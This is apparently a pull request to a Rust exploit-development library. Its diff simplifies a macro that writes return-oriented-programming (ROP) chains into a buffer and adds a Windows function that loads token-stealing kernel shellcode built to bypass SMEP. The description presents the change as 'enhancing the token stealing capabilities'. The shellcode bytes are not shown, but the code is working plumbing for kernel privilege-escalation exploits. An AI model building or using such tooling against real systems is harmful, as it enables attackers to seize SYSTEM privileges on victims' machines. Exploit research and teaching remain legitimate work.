### PR TITLE
feat(rop, shellcode): simplify ROP chain macro and add new shellcode …

### DIFF
--- a/src/rop.rs
+++ b/src/rop.rs
@@ -17,14 +17,8 @@ macro_rules! create_rop_chain {
 
 #[macro_export]
 macro_rules! create_rop_chain_to_buffer {
-    ($buffer:expr, $base:expr, $($value:expr),+ $(,)?) => {{
+    ($buffer:expr, $($value:expr),+ $(,)?) => {{
         let mut offset = 0;
-        // Fill buffer with padding bytes
-        for i in 0..$base {
-            $buffer[i] = 0x90u8;
-        }
-        offset += $base;
-        // Write each value in little-endian
         $(
             let bytes = $value.to_le_bytes();
             $buffer[offset..offset + bytes.len()].copy_from_slice(&bytes);

--- a/src/shellcode.rs
+++ b/src/shellcode.rs
@@ -259,6 +259,15 @@ pub fn token_stealing_shellcode_smep_no_kvashadow() -> Vec<u8> {
     extract_shellcode_from_obj(shellcode_obj)
 }
 
+#[cfg(all(target_os = "windows", not(feature = "shellcode_fallback")))]
+pub fn token_stealing_shellcode_smep_no_kvashadow_pte() -> Vec<u8> {
+    let shellcode_obj = include_bytes!(concat!(
+        env!("OUT_DIR"),
+        "/token_stealing_shellcode_smep_no_kvashadow_pte.obj"
+    ));
+    extract_shellcode_from_obj(shellcode_obj)
+}
+
 #[cfg(all(
     target_os = "windows",
     target_arch = "x86_64",


### PR DESCRIPTION
…function

- Refactored `create_rop_chain_to_buffer` macro to remove unnecessary base padding, streamlining the process of writing ROP chains directly to a buffer.
- Introduced a new function `token_stealing_shellcode_smep_no_kvashadow_pte` for extracting shellcode from a newly added object file, enhancing the token stealing capabilities on Windows.